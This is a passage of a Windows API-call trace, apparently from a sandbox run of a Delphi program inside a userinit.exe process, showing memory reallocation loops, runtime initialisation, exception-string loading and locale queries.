[0148.287] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.287] GlobalUnlock (hMem=0x36000c) returned 0
[0148.288] GlobalReAlloc (hMem=0x36000c, dwBytes=0x94000, uFlags=0x2) returned 0x36000c
[0148.302] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.303] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.303] GlobalUnlock (hMem=0x36000c) returned 0
[0148.303] GlobalReAlloc (hMem=0x36000c, dwBytes=0x96000, uFlags=0x2) returned 0x36000c
[0148.320] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.321] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.321] GlobalUnlock (hMem=0x36000c) returned 0
[0148.321] GlobalReAlloc (hMem=0x36000c, dwBytes=0x98000, uFlags=0x2) returned 0x36000c
[0148.337] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.338] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.338] GlobalUnlock (hMem=0x36000c) returned 0
[0148.338] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9a000, uFlags=0x2) returned 0x36000c
[0148.353] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.353] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.353] GlobalUnlock (hMem=0x36000c) returned 0
[0148.353] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9c000, uFlags=0x2) returned 0x36000c
[0148.367] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.368] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.368] GlobalUnlock (hMem=0x36000c) returned 0
[0148.368] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9e000, uFlags=0x2) returned 0x36000c
[0148.383] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.384] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.384] GlobalUnlock (hMem=0x36000c) returned 0
[0148.384] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa0000, uFlags=0x2) returned 0x36000c
[0148.399] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.400] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.400] GlobalUnlock (hMem=0x36000c) returned 0
[0148.400] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa2000, uFlags=0x2) returned 0x36000c
[0148.414] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.415] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.415] GlobalUnlock (hMem=0x36000c) returned 0
[0148.415] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa4000, uFlags=0x2) returned 0x36000c
[0148.431] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.432] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.432] GlobalUnlock (hMem=0x36000c) returned 0
[0148.432] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa6000, uFlags=0x2) returned 0x36000c
[0148.449] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.450] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.450] GlobalUnlock (hMem=0x36000c) returned 0
[0148.450] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa8000, uFlags=0x2) returned 0x36000c
[0148.466] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.467] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.467] GlobalUnlock (hMem=0x36000c) returned 0
[0148.467] GlobalReAlloc (hMem=0x36000c, dwBytes=0xaa000, uFlags=0x2) returned 0x36000c
[0148.484] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.485] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.485] GlobalUnlock (hMem=0x36000c) returned 0
[0148.485] GlobalReAlloc (hMem=0x36000c, dwBytes=0xac000, uFlags=0x2) returned 0x36000c
[0148.502] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.503] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.503] GlobalUnlock (hMem=0x36000c) returned 0
[0148.503] GlobalReAlloc (hMem=0x36000c, dwBytes=0xae000, uFlags=0x2) returned 0x36000c
[0148.520] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.521] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.521] GlobalUnlock (hMem=0x36000c) returned 0
[0148.521] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb0000, uFlags=0x2) returned 0x36000c
[0148.540] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.541] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.541] GlobalUnlock (hMem=0x36000c) returned 0
[0148.541] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb2000, uFlags=0x2) returned 0x36000c
[0148.570] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.572] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.572] GlobalUnlock (hMem=0x36000c) returned 0
[0148.572] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb4000, uFlags=0x2) returned 0x36000c
[0148.602] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.603] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.603] GlobalUnlock (hMem=0x36000c) returned 0
[0148.603] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb6000, uFlags=0x2) returned 0x36000c
[0148.624] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.625] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.625] GlobalUnlock (hMem=0x36000c) returned 0
[0148.625] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb8000, uFlags=0x2) returned 0x36000c
[0148.652] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.653] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.653] GlobalUnlock (hMem=0x36000c) returned 0
[0148.654] GlobalReAlloc (hMem=0x36000c, dwBytes=0xba000, uFlags=0x2) returned 0x36000c
[0148.672] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.674] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.674] GlobalUnlock (hMem=0x36000c) returned 0
[0148.674] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbc000, uFlags=0x2) returned 0x36000c
[0148.693] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.694] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.694] GlobalUnlock (hMem=0x36000c) returned 0
[0148.694] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbe000, uFlags=0x2) returned 0x36000c
[0148.714] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.715] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.715] GlobalUnlock (hMem=0x36000c) returned 0
[0148.715] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc0000, uFlags=0x2) returned 0x36000c
[0148.734] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.735] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.735] GlobalUnlock (hMem=0x36000c) returned 0
[0148.735] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc2000, uFlags=0x2) returned 0x36000c
[0148.755] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.756] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.756] GlobalUnlock (hMem=0x36000c) returned 0
[0148.756] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc4000, uFlags=0x2) returned 0x36000c
[0148.777] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.778] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.778] GlobalUnlock (hMem=0x36000c) returned 0
[0148.778] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc6000, uFlags=0x2) returned 0x36000c
[0148.798] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.799] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.799] GlobalUnlock (hMem=0x36000c) returned 0
[0148.799] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc8000, uFlags=0x2) returned 0x36000c
[0148.830] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.831] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.831] GlobalUnlock (hMem=0x36000c) returned 0
[0148.831] GlobalReAlloc (hMem=0x36000c, dwBytes=0xca000, uFlags=0x2) returned 0x36000c
[0148.852] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.853] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.853] GlobalUnlock (hMem=0x36000c) returned 0
[0148.853] GlobalReAlloc (hMem=0x36000c, dwBytes=0xcc000, uFlags=0x2) returned 0x36000c
[0148.874] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.875] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.875] GlobalUnlock (hMem=0x36000c) returned 0
[0148.875] GlobalReAlloc (hMem=0x36000c, dwBytes=0xce000, uFlags=0x2) returned 0x36000c
[0148.896] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.897] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.897] GlobalUnlock (hMem=0x36000c) returned 0
[0148.897] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd0000, uFlags=0x2) returned 0x36000c
[0148.918] GlobalLock (hMem=0x36000c) returned 0x2800020
[0148.919] GlobalHandle (pMem=0x2800020) returned 0x36000c
[0148.919] GlobalUnlock (hMem=0x36000c) returned 0
[0148.919] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd2000, uFlags=0x2) returned 0x36000c
[0148.941] GlobalLock (hMem=0x36000c) returned 0x28e0020
[0148.942] GlobalHandle (pMem=0x28e0020) returned 0x36000c
[0148.942] GlobalUnlock (hMem=0x36000c) returned 0
[0148.942] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd4000, uFlags=0x2) returned 0x36000c
[0148.964] GlobalLock (hMem=0x36000c) returned 0x2730020
[0148.965] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0148.965] GlobalUnlock (hMem=0x36000c) returned 0
[0148.965] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd6000, uFlags=0x2) returned 0x36000c
[0148.987] GlobalLock (hMem=0x36000c) returned 0x2810020
[0148.988] GlobalHandle (pMem=0x2810020) returned 0x36000c
[0148.988] GlobalUnlock (hMem=0x36000c) returned 0
[0148.988] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd8000, uFlags=0x2) returned 0x36000c
[0149.025] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.026] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.026] GlobalUnlock (hMem=0x36000c) returned 0
[0149.026] GlobalReAlloc (hMem=0x36000c, dwBytes=0xda000, uFlags=0x2) returned 0x36000c
[0149.049] GlobalLock (hMem=0x36000c) returned 0x2810020
[0149.050] GlobalHandle (pMem=0x2810020) returned 0x36000c
[0149.050] GlobalUnlock (hMem=0x36000c) returned 0
[0149.050] GlobalReAlloc (hMem=0x36000c, dwBytes=0xdc000, uFlags=0x2) returned 0x36000c
[0149.071] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.072] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.072] GlobalUnlock (hMem=0x36000c) returned 0
[0149.072] GlobalReAlloc (hMem=0x36000c, dwBytes=0xde000, uFlags=0x2) returned 0x36000c
[0149.092] GlobalLock (hMem=0x36000c) returned 0x2810020
[0149.093] GlobalHandle (pMem=0x2810020) returned 0x36000c
[0149.093] GlobalUnlock (hMem=0x36000c) returned 0
[0149.093] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe0000, uFlags=0x2) returned 0x36000c
[0149.113] GlobalLock (hMem=0x36000c) returned 0x28f0020
[0149.114] GlobalHandle (pMem=0x28f0020) returned 0x36000c
[0149.115] GlobalUnlock (hMem=0x36000c) returned 0
[0149.115] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe2000, uFlags=0x2) returned 0x36000c
[0149.135] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.136] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.136] GlobalUnlock (hMem=0x36000c) returned 0
[0149.136] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe4000, uFlags=0x2) returned 0x36000c
[0149.157] GlobalLock (hMem=0x36000c) returned 0x2820020
[0149.158] GlobalHandle (pMem=0x2820020) returned 0x36000c
[0149.158] GlobalUnlock (hMem=0x36000c) returned 0
[0149.158] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe6000, uFlags=0x2) returned 0x36000c
[0149.180] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.181] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.181] GlobalUnlock (hMem=0x36000c) returned 0
[0149.181] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe8000, uFlags=0x2) returned 0x36000c
[0149.202] GlobalLock (hMem=0x36000c) returned 0x2820020
[0149.203] GlobalHandle (pMem=0x2820020) returned 0x36000c
[0149.203] GlobalUnlock (hMem=0x36000c) returned 0
[0149.203] GlobalReAlloc (hMem=0x36000c, dwBytes=0xea000, uFlags=0x2) returned 0x36000c
[0149.224] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.225] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.225] GlobalUnlock (hMem=0x36000c) returned 0
[0149.225] GlobalReAlloc (hMem=0x36000c, dwBytes=0xec000, uFlags=0x2) returned 0x36000c
[0149.246] GlobalLock (hMem=0x36000c) returned 0x2820020
[0149.247] GlobalHandle (pMem=0x2820020) returned 0x36000c
[0149.247] GlobalUnlock (hMem=0x36000c) returned 0
[0149.247] GlobalReAlloc (hMem=0x36000c, dwBytes=0xee000, uFlags=0x2) returned 0x36000c
[0149.270] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.271] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.271] GlobalUnlock (hMem=0x36000c) returned 0
[0149.271] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf0000, uFlags=0x2) returned 0x36000c
[0149.296] GlobalLock (hMem=0x36000c) returned 0x2820020
[0149.298] GlobalHandle (pMem=0x2820020) returned 0x36000c
[0149.298] GlobalUnlock (hMem=0x36000c) returned 0
[0149.298] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf2000, uFlags=0x2) returned 0x36000c
[0149.326] GlobalLock (hMem=0x36000c) returned 0x2920020
[0149.327] GlobalHandle (pMem=0x2920020) returned 0x36000c
[0149.327] GlobalUnlock (hMem=0x36000c) returned 0
[0149.327] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf4000, uFlags=0x2) returned 0x36000c
[0149.355] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.356] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.356] GlobalUnlock (hMem=0x36000c) returned 0
[0149.356] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf6000, uFlags=0x2) returned 0x36000c
[0149.386] GlobalLock (hMem=0x36000c) returned 0x2830020
[0149.387] GlobalHandle (pMem=0x2830020) returned 0x36000c
[0149.387] GlobalUnlock (hMem=0x36000c) returned 0
[0149.387] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf8000, uFlags=0x2) returned 0x36000c
[0149.417] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.418] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.418] GlobalUnlock (hMem=0x36000c) returned 0
[0149.418] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfa000, uFlags=0x2) returned 0x36000c
[0149.445] GlobalLock (hMem=0x36000c) returned 0x2830020
[0149.446] GlobalHandle (pMem=0x2830020) returned 0x36000c
[0149.446] GlobalUnlock (hMem=0x36000c) returned 0
[0149.446] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfc000, uFlags=0x2) returned 0x36000c
[0149.474] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.475] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.475] GlobalUnlock (hMem=0x36000c) returned 0
[0149.475] GlobalReAlloc (hMem=0x36000c, dwBytes=0xfe000, uFlags=0x2) returned 0x36000c
[0149.503] GlobalLock (hMem=0x36000c) returned 0x2830020
[0149.504] GlobalHandle (pMem=0x2830020) returned 0x36000c
[0149.504] GlobalUnlock (hMem=0x36000c) returned 0
[0149.504] GlobalReAlloc (hMem=0x36000c, dwBytes=0x100000, uFlags=0x2) returned 0x36000c
[0149.531] GlobalLock (hMem=0x36000c) returned 0x2930020
[0149.532] GlobalHandle (pMem=0x2930020) returned 0x36000c
[0149.532] GlobalUnlock (hMem=0x36000c) returned 0
[0149.532] GlobalReAlloc (hMem=0x36000c, dwBytes=0x102000, uFlags=0x2) returned 0x36000c
[0149.561] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.562] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.562] GlobalUnlock (hMem=0x36000c) returned 0
[0149.562] GlobalReAlloc (hMem=0x36000c, dwBytes=0x104000, uFlags=0x2) returned 0x36000c
[0149.590] GlobalLock (hMem=0x36000c) returned 0x2840020
[0149.591] GlobalHandle (pMem=0x2840020) returned 0x36000c
[0149.591] GlobalUnlock (hMem=0x36000c) returned 0
[0149.591] GlobalReAlloc (hMem=0x36000c, dwBytes=0x106000, uFlags=0x2) returned 0x36000c
[0149.616] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.617] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.617] GlobalUnlock (hMem=0x36000c) returned 0
[0149.617] GlobalReAlloc (hMem=0x36000c, dwBytes=0x108000, uFlags=0x2) returned 0x36000c
[0149.641] GlobalLock (hMem=0x36000c) returned 0x2840020
[0149.642] GlobalHandle (pMem=0x2840020) returned 0x36000c
[0149.642] GlobalUnlock (hMem=0x36000c) returned 0
[0149.642] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10a000, uFlags=0x2) returned 0x36000c
[0149.667] GlobalLock (hMem=0x36000c) returned 0x2730020
[0149.668] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0149.668] GlobalUnlock (hMem=0x36000c) returned 0
[0149.668] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10c000, uFlags=0x2) returned 0x36000c
[0149.697] GlobalLock (hMem=0x36000c) returned 0x2840020
[0149.698] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2730000
[0149.698] VirtualAlloc (lpAddress=0x2730000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2730000
[0149.750] GetKeyboardType (nTypeFlag=0) returned 4
[0149.750] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0149.750] GetStartupInfoA (in: lpStartupInfo=0x18f640 | out: lpStartupInfo=0x18f640*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0149.750] GetVersion () returned 0x1db10106
[0149.750] GetVersion () returned 0x1db10106
[0149.750] GetCurrentThreadId () returned 0x524
[0149.750] GetModuleFileNameA (in: hModule=0x2950000, lpFilename=0x18f13c, nSize=0x105 | out: lpFilename="Lñ\x18" (normalized: "c:\\windows\\system32\\lñ\x18")) returned 0x0
[0149.750] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f017, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.750] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f12c | out: phkResult=0x18f12c*=0x0) returned 0x2
[0149.750] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f12c | out: phkResult=0x18f12c*=0x0) returned 0x2
[0149.750] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f12c | out: phkResult=0x18f12c*=0x0) returned 0x2
[0149.750] lstrcpynA (in: lpString1=0x18f017, lpString2="Lñ\x18", iMaxLength=261 | out: lpString1="Lñ\x18") returned="Lñ\x18"
[0149.750] GetThreadLocale () returned 0x409
[0149.750] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f127, cchData=5 | out: lpLCData="ENU") returned 4
[0149.750] lstrlenA (lpString="Lñ\x18") returned 3
[0149.751] LoadStringA (in: hInstance=0x2950000, uID=0xffc4, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0149.751] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x62dcc0
[0149.751] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a70000
[0149.751] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x62ecc0
[0149.751] VirtualAlloc (lpAddress=0x2a70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a70000
[0149.751] LoadStringA (in: hInstance=0x2950000, uID=0xffc3, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0149.751] LoadStringA (in: hInstance=0x2950000, uID=0xffc1, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0149.751] LoadStringA (in: hInstance=0x2950000, uID=0xffc2, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0149.751] LoadStringA (in: hInstance=0x2950000, uID=0xffd4, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffdd, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffd3, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffd0, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffd7, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffd6, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe8, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe9, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffea, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe7, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe5, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe3, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe2, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe1, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffe0, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xffff, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xfffe, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xfffd, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xfffc, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xfffb, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0149.752] LoadStringA (in: hInstance=0x2950000, uID=0xfffa, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xfff9, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xfff8, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xfff7, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xfff6, lpBuffer=0x18f260, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xfff4, lpBuffer=0x18f24c, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0149.753] LoadStringA (in: hInstance=0x2950000, uID=0xffe4, lpBuffer=0x18f24c, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0149.753] GetVersionExA (in: lpVersionInformation=0x18f5e4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2950000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x95\x02·\"\x95\x02|ö\x18") | out: lpVersionInformation=0x18f5e4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0149.753] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0149.753] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0149.754] GetThreadLocale () returned 0x409
[0149.754] GetThreadLocale () returned 0x409
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Jan") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="January") returned 8
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Feb") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="February") returned 9
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Mar") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="March") returned 6
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Apr") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="April") returned 6
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="May") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="May") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Jun") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="June") returned 5
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Jul") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="July") returned 5
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Aug") returned 4
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="August") returned 7
[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Sep") returned 4
